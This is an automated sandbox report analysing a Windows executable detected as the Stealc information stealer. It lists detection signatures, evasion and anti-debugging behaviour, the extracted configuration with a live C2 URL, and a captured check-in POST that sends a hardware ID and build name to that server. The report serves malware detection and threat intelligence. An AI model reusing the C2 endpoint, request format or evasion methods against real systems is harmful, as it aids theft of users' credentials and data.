Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1543580
MD5:6fb5f961b07cc3d84be8823133c05c50
SHA1:482608c2008a693ff1bad6ca205dec70ef67e370
SHA256:b42bb6681e8e078f5c11a99ad67040722bc93a9eebb2f4f5604f6c571112b488
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6FB5F961B07CC3D84BE8823133C05C50)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1350066957.0000000005670000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7328JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7328JoeSecurity_StealcYara detected StealcJoe Security
              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.e10000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-28T07:18:28.265872+010020442431Malware Command and Control Activity Detected192.168.2.749704185.215.113.20680TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exeAvira: detected
                Source: 0.2.file.exe.e10000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                Source: http://185.215.113.206/6c4adf523b719729.phpVirustotal: Detection: 16%Perma Link
                Source: file.exeReversingLabs: Detection: 39%
                Source: file.exeVirustotal: Detection: 41%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00E29030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E172A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00E172A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00E1A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00E1A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00E1C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1350066957.000000000569B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1350066957.000000000569B000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00E240F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E1E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00E247C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E1F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E11710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E1DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E24B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E23B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E1BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E1EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E1DF10

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49704 -> 185.215.113.206:80
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 41 37 35 33 33 34 33 39 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 2d 2d 0d 0a Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="hwid"A8A7533439EB3294564547------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="build"tale------DBFIEHDHIIIECAAKECFH--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E162D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00E162D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 41 37 35 33 33 34 33 39 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 2d 2d 0d 0a Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="hwid"A8A7533439EB3294564547------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="build"tale------DBFIEHDHIIIECAAKECFH--
                Source: file.exe, 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/&
                Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1391285301.0000000001AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php//
                Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php=6u2
                Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpI5
                Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpU5
                Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpl
                Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpq5
                Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php~
                Source: file.exe, 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206RG
                Source: file.exe, file.exe, 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1350066957.000000000569B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D1650_2_0126D165
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E500980_2_00E50098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0127C1B80_2_0127C1B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6B1980_2_00E6B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E421380_2_00E42138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E542880_2_00E54288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E7E2580_2_00E7E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8D39E0_2_00E8D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9B3080_2_00E9B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B45350_2_011B4535
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E545A80_2_00E545A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E7D5A80_2_00E7D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E345730_2_00E34573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3E5440_2_00E3E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E996FD0_2_00E996FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E566C80_2_00E566C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012757140_2_01275714
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012687B80_2_012687B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8A6480_2_00E8A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011887D60_2_011887D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0127A60D0_2_0127A60D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115264C0_2_0115264C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E867990_2_00E86799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6D7200_2_00E6D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E7F8D60_2_00E7F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6B8A80_2_00E6B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E698B80_2_00E698B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E648680_2_00E64868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0110A82B0_2_0110A82B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01179B360_2_01179B36
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E78BD90_2_00E78BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E84BA80_2_00E84BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01269A680_2_01269A68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E80B880_2_00E80B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EDABD0_2_011EDABD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01154DB10_2_01154DB1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8AC280_2_00E8AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E64DC80_2_00E64DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B6C5B0_2_011B6C5B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E65DB90_2_00E65DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126EC4B0_2_0126EC4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6BD680_2_00E6BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41D780_2_00E41D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01273CE20_2_01273CE2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E7AD380_2_00E7AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E81EE80_2_00E81EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115EF830_2_0115EF83
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E58E780_2_00E58E78
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E14610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: gaborkim ZLIB complexity 0.994803874890126
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00E29790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E23970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00E23970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\93WQ31SM.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 39%
                Source: file.exeVirustotal: Detection: 41%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2185728 > 1048576
                Source: file.exeStatic PE information: Raw size of gaborkim is bigger than: 0x100000 < 0x1aaa00
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1350066957.000000000569B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1350066957.000000000569B000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.e10000.0.unpack :EW;.rsrc :W;.idata :W; :EW;gaborkim:EW;pqqqwztq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;gaborkim:EW;pqqqwztq:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E29BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x2168d6 should be: 0x218ab4
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: gaborkim
                Source: file.exeStatic PE information: section name: pqqqwztq
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3A0F3 push eax; retf 0_2_00E3A119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130412E push 207590FFh; mov dword ptr [esp], edi0_2_0130413C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129D104 push eax; mov dword ptr [esp], ecx0_2_0129D160
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128E107 push 3DBF264Fh; mov dword ptr [esp], ebp0_2_0128D9F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128E107 push 2EC4E392h; mov dword ptr [esp], esp0_2_0128DA00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128E107 push 786A40F2h; mov dword ptr [esp], ebp0_2_0128E697
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128E107 push ecx; mov dword ptr [esp], esi0_2_01290641
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115B12B push ecx; mov dword ptr [esp], edi0_2_0115B16B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115B12B push ebx; mov dword ptr [esp], ecx0_2_0115B1AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115B12B push 5F0944DAh; mov dword ptr [esp], edi0_2_0115B225
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115B12B push 2AAB5019h; mov dword ptr [esp], ecx0_2_0115B23E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115B12B push 6679AD5Ch; mov dword ptr [esp], edx0_2_0115B276
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3A0DC push eax; retf 0_2_00E3A0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push 02A6F7B1h; mov dword ptr [esp], edx0_2_0126D170
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push eax; mov dword ptr [esp], edx0_2_0126D1D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push ecx; mov dword ptr [esp], 738B2478h0_2_0126D275
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push esi; mov dword ptr [esp], eax0_2_0126D285
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push ebx; mov dword ptr [esp], esi0_2_0126D32C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push ebp; mov dword ptr [esp], 777D098Ah0_2_0126D330
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push 32BA9960h; mov dword ptr [esp], edi0_2_0126D415
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push edi; mov dword ptr [esp], eax0_2_0126D450
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push 79BD88EFh; mov dword ptr [esp], eax0_2_0126D460
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push ebp; mov dword ptr [esp], eax0_2_0126D4B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push 14271941h; mov dword ptr [esp], edi0_2_0126D4C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push eax; mov dword ptr [esp], 6FEB8B94h0_2_0126D4E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push 047C0500h; mov dword ptr [esp], esi0_2_0126D4F3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push edx; mov dword ptr [esp], edi0_2_0126D503
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push ebp; mov dword ptr [esp], 7B71566Fh0_2_0126D50A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push 568C6F38h; mov dword ptr [esp], eax0_2_0126D568
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push ebx; mov dword ptr [esp], ebp0_2_0126D581
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126D165 push eax; mov dword ptr [esp], edx0_2_0126D5FB
                Source: file.exeStatic PE information: section name: gaborkim entropy: 7.953963790635809

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
